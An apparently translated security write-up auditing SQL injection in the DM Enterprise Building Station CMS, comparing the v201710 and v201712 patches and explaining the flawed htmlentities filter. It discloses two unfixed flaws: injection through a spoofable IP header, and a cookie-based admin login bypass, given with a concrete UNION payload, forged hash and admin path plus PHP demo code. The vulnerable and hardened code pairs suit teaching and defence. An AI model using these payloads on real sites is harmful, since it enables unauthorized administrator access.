DM Enterprise Building Station System v201710 SQL Injection Vulnerability Analysis | SQL injection still exists in the new v201712

Source: Internet
Author: User
Tags: md5

0x00 Preface

Originally I had no intention of auditing this CMS. I downloaded it, opened it up, and found debug comments all over the place and formatting that was a mess.

Pasting a few pages to look at:

It felt like a beginner's practice project, and I had no desire to audit it.

But then I thought: I'm a beginner too, so I kept reading.

Just a little. The Seay tool's automatic scan flagged a few key points and found injection. Since there was injection, I took a proper look.

PhpStorm, the Seay source code audit tool, and a local demo set up.

After reading through it, I wanted to write a summary article, with the title:

DM Enterprise Building Station System v201710 has SQL injection

Maybe because the code formatting put me off, or for other reasons

...

I don't know how many minutes later, I happened to notice that reports on this system had already been submitted to CNVD, and two of them at that?!

So I decided to go through the whole system.

0x01 CNVD reports and vendor patches

Let's see how the reports on CNVD are written.

Submission time 10-23, very early...

It gets to the point: there is SQL injection at the backend login.

Let's look at the other one.

Oops, submitted on the 24th; you two really were fated to meet.

This report looks like a systematic audit; several parameters were found. Even so, the vendor has since released a patch.

The latest version is dated 12.1.

0x03 Old and new version comparison

Since I had already read the old version's code, I also knew that the old version has injection problems in many parameters.

The previous version filtered parameters with this function

This function is the author's own. Follow it into

global.common.php

You will find that htmlentities is used for filtering. Note the second argument to the function: ENT_NOQUOTES. What does that mean?

With ENT_NOQUOTES, htmlentitiesdm encodes <, >, & and the other characters that have named HTML entities, but single and double quotes pass through completely untouched.

So what is this filter for? Perhaps the author was trying to prevent XSS?!

In other words, input that only goes through this function is injectable as long as nothing else filters it before it reaches the database.

For example, the first CNVD report says the backend login has injection??

See login.php

It is run through htmlentitiesdm once, filtered no further, and goes straight into the database. Injection is trivial.

The second report lists several injectable parameters; presumably they were all filtered with this same function. I won't dig them out here.

Now let's turn to the new version.

Open the trusty Beyond Compare and load the old and new versions.

You'll find that many changes have been made.

Let's go straight to global.common.php and see whether htmlentitiesdm has changed.

It has: ENT_NOQUOTES became ENT_QUOTES.

That is, from never encoding any quotation marks to encoding all of them.

In other words, this one change closes both CNVD holes, since encoding the quotes keeps the payload inside the string literal. (It does nothing for a value spliced into a query without quotes, such as a numeric id; neither version of the function touches that case.)

login.php's backend login injection

and the other input parameters are now all filtered through htmlentitiesdm.

I won't list them one by one.
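To make the ENT_NOQUOTES / ENT_QUOTES difference concrete, here is an added example (not the CMS's own code): a filter shaped like htmlentitiesdm in its old and new forms, applied to the kind of input a login form receives, followed by the prepared-statement version that does not depend on context at all. The table and column names are assumptions.

```php
<?php
// Added example, not the CMS's own code: a filter shaped like the page's
// htmlentitiesdm, in its old (ENT_NOQUOTES) and new (ENT_QUOTES) forms, fed the
// kind of input a login form receives. Table and column names are assumptions.

function htmlentitiesdm_old(string $s): string
{
    return htmlentities($s, ENT_NOQUOTES, 'UTF-8'); // encodes & < > but not ' or "
}

function htmlentitiesdm_new(string $s): string
{
    return htmlentities($s, ENT_QUOTES, 'UTF-8');   // also encodes ' and "
}

// The shape of the old login.php as the analysis describes it: filter, then concatenate.
function build_login_query(string $user, string $pass, callable $filter): string
{
    $u = $filter($user);
    $p = $filter($pass);
    return "SELECT * FROM dm_admin WHERE username='$u' AND password='$p'";
}

$payload = "admin' OR '1'='1";

echo build_login_query($payload, 'x', 'htmlentitiesdm_old'), PHP_EOL;
// SELECT * FROM dm_admin WHERE username='admin' OR '1'='1' AND password='x'
// The quote survives, so the attacker's text is parsed as SQL.

echo build_login_query($payload, 'x', 'htmlentitiesdm_new'), PHP_EOL;
// SELECT * FROM dm_admin WHERE username='admin&#039; OR &#039;1&#039;=&#039;1' AND password='x'
// The quote is now an entity; the whole payload stays inside one string literal.

// What ENT_QUOTES does not cover: a value dropped into the query without quotes.
// Nothing here needs a quote, so the new filter passes it through unchanged.
$id = '7 OR 1=1';
echo 'SELECT * FROM dm_news WHERE id=' . htmlentitiesdm_new($id), PHP_EOL;
// SELECT * FROM dm_news WHERE id=7 OR 1=1

// The fix that holds in every context: bind the values instead of splicing them.
function find_admin(PDO $db, string $user, string $pass): ?array
{
    $st = $db->prepare('SELECT * FROM dm_admin WHERE username = ? AND password = ?');
    $st->execute([$user, $pass]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```

The entity-encoding approach also changes what gets stored (the database ends up holding `&#039;` rather than a quote), which is a sign that an output-encoding function is being used for an input-handling job.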

0x04 The new version still has SQL injection

After comparing the old and new versions I started to laugh, because a few SQL injection points I had found were not fixed.

Haha, for once I'm the one holding a 0day!

1. The common GetIP() function is used without filtering, leading to SQL injection

First look at the old version's global.common.php: obviously there is no filtering.

Where is this function used? Two locations in the frontend.

One is file_formpost_concat, used for leaving messages; the other is file_order_post.php, used for ordering.

In my testing only the message (guestbook) one was usable.

Look at the code: in the old version the content and tokenhour parameters were injectable.

The new version has filtered them.

But the way the IP is obtained here has not changed.

So what we have is a boolean-based blind injection: nothing is echoed back, so the only signal is whether the request behaves differently.

Straight into sqlmap.
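The page does not reproduce the body of the CMS's GetIP(), so the added example below (not the project's code) uses the pattern such helpers usually follow: trust HTTP_CLIENT_IP or HTTP_X_FORWARDED_FOR before falling back to REMOTE_ADDR. Both of those are request headers the client sets freely, which is why the value reaches the INSERT with attacker-chosen text. The hardened version validates the address and only believes a forwarded header when a known reverse proxy is in front. The table and column names are assumptions.

```php
<?php
// Added example, not the CMS's own code. The page does not reproduce the body
// of its GetIP(); the one below follows the pattern such helpers usually have,
// and the table/column names are assumptions.

// The usual "trust any proxy header" helper: everything it returns except
// REMOTE_ADDR is a request header the client controls outright.
function getip_trusting(array $server): string
{
    foreach (['HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR'] as $key) {
        if (!empty($server[$key])) {
            return $server[$key];
        }
    }
    return '0.0.0.0';
}

// Hardened: use the socket address unless a trusted reverse proxy is in front,
// and in either case accept only a syntactically valid IP address.
function getip_hardened(array $server, array $trustedProxies = []): string
{
    $ip = $server['REMOTE_ADDR'] ?? '';
    if ($ip !== '' && in_array($ip, $trustedProxies, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        // X-Forwarded-For is "client, proxy1, ..."; a single trusted proxy appends
        // the address it saw, so the last element is the one it vouches for.
        $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
        $ip = end($hops);
    }
    $valid = filter_var($ip, FILTER_VALIDATE_IP);
    return $valid === false ? '0.0.0.0' : $valid;
}

// Constructed request: a guestbook post whose X-Forwarded-For carries a payload.
$server = [
    'REMOTE_ADDR'          => '203.0.113.10',
    'HTTP_X_FORWARDED_FOR' => "1.1.1.1' AND 1=1 AND 'a'='a",
];

$content = htmlentities('hello', ENT_QUOTES, 'UTF-8'); // the parameter the vendor did filter
$ipOld   = getip_trusting($server);                    // the one it did not
echo "INSERT INTO dm_message (content, ip) VALUES ('$content', '$ipOld')", PHP_EOL;
// INSERT INTO dm_message (content, ip) VALUES ('hello', '1.1.1.1' AND 1=1 AND 'a'='a')
// The header text is now part of the SQL; swap 1=1 for 1=2 and the statement's
// behaviour changes, which is the true/false signal a blind injection needs.

echo getip_hardened($server), PHP_EOL;                 // 203.0.113.10: no trusted proxy, header ignored
echo getip_hardened($server, ['203.0.113.10']), PHP_EOL; // 0.0.0.0: proxy trusted, but the hop is not an IP

// Even a validated IP belongs in a bound parameter, not in the query text.
function insert_message(PDO $db, string $content, string $ip): bool
{
    $st = $db->prepare('INSERT INTO dm_message (content, ip) VALUES (?, ?)');
    return $st->execute([$content, $ip]);
}
```

Validation alone is not the fix here; it narrows the value to something that cannot carry SQL, but the bound parameter is what makes the query safe regardless of how the address was obtained.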

2. The backend authentication check has injection, and login can be bypassed outright

Look at the latest version's backend authentication in admindm-yourname/config-a/common.inc2010.php

Compared with the old version, you can see nothing has changed.

Let's take a closer look at this code:

Because the cookie here is under our control, we can inject directly and bypass the login without knowing any password.

Analyzing the code, we can draw this conclusion.

Why is userps also controllable? Because there is injection here.

Through the injection we can make the password the query returns whatever we choose.

Then we can construct the cookie directly and log in as administrator.

For example, we use ps = 1, and the id is the cookie value carrying the injected statement.

According to the formula

usercookiecompare = userid-md5(userps, cookiesecret)

Construct the MD5 part first:

So our usercookie is:

7 ' and 1=2 Union select Null,null,null,null,null,1,null,null,null,null,null,null,null #- 7b0bbade54ef65e2a830c034d0d14e61

Set the three cookies, visit /admindm-yourname/mod_common/index-welcome.php?lang=cn, and you are straight into the backend.
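The added example below (not the CMS's own code) reproduces the shape of the check described above so the bypass can be run end to end against an in-memory SQLite table: the cookie is `<id>-<md5(ps . secret)>`, the id is spliced into a SELECT, and the hash is recomputed from whatever password that SELECT returns. Because the UNION chooses that password, the attacker computes a matching hash offline. The table, its three columns (the page's payload pads to 14 on the real system), the cookie separator and the secret value are assumptions, and the SQLite comment `--` stands in for MySQL's `#`.

```php
<?php
// Added example, not the CMS's own code. Table name, column names, the cookie
// separator and the secret are assumptions; the real table has more columns
// (the page's payload pads to 14). Needs PHP's pdo_sqlite extension; SQLite
// comments use "--" where the page's MySQL payload used "#".

const COOKIE_SECRET = 'dm_default_secret'; // assumption: a constant in the CMS config

function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE dm_admin (id INTEGER PRIMARY KEY, username TEXT, ps TEXT)');
    $db->exec("INSERT INTO dm_admin VALUES (7, 'admin', 'realpass')");
    return $db;
}

// Split "<id>-<hash>" at the last dash, so dashes inside the id part are tolerated.
function split_cookie(string $cookie): ?array
{
    $sep = strrpos($cookie, '-');
    if ($sep === false) {
        return null;
    }
    return [substr($cookie, 0, $sep), substr($cookie, $sep + 1)];
}

// Vulnerable: the id goes into the SQL text, and the "password" that gets hashed
// is whatever row the query hands back, not necessarily a real one.
function admin_from_cookie_vulnerable(PDO $db, string $cookie): ?array
{
    [$userid, $hash] = split_cookie($cookie) ?? [null, null];
    if ($userid === null) {
        return null;
    }
    $row = $db->query("SELECT id, username, ps FROM dm_admin WHERE id='$userid'")
              ->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }
    return md5($row['ps'] . COOKIE_SECRET) === $hash ? $row : null;
}

// Hardened: integer id, bound parameter, keyed hash of the stored credential,
// constant-time compare. A random server-side session id would be better still;
// this keeps the page's cookie design to show the minimal repair.
function admin_from_cookie_hardened(PDO $db, string $cookie): ?array
{
    [$userid, $hash] = split_cookie($cookie) ?? [null, null];
    if ($userid === null || !ctype_digit($userid)) {
        return null;
    }
    $st = $db->prepare('SELECT id, username, ps FROM dm_admin WHERE id = ?');
    $st->execute([(int) $userid]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }
    $expected = hash_hmac('sha256', (string) $row['ps'], COOKIE_SECRET);
    return hash_equals($expected, $hash) ? $row : null;
}

// The attacker's cookie: the id part is the injection, choosing '1' as the
// password the UNION returns; the hash part is md5('1' . secret), computed
// offline because the secret is a known constant.
$injectedId   = "7' AND 1=2 UNION SELECT NULL, NULL, '1' -- ";
$forgedCookie = $injectedId . '-' . md5('1' . COOKIE_SECRET);

$db = make_db();
var_dump(admin_from_cookie_vulnerable($db, $forgedCookie) !== null); // bool(true): in, no password known
var_dump(admin_from_cookie_hardened($db, $forgedCookie) !== null);   // bool(false)

// The hardened check still admits a cookie minted for the real stored credential.
$genuine = '7-' . hash_hmac('sha256', 'realpass', COOKIE_SECRET);
var_dump(admin_from_cookie_hardened($db, $genuine)['username']);     // string(5) "admin"
```

The root problem is that the check trusts a value derived from the query result to verify the query's own input. Once the id is bound as a parameter the UNION is impossible, and the keyed hash plus constant-time compare close the remaining weaknesses of a plain md5 of password and secret.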

For time reasons I didn't look at other issues.

There must be many more problems; with code this messy, the odds of mistakes go up a lot.

0x05 Summary

Overall this is a fairly simple CMS, well suited to beginners like us.

I don't know why such a simple CMS can also rack up CNVD entries. Is CNVD really that easy?!
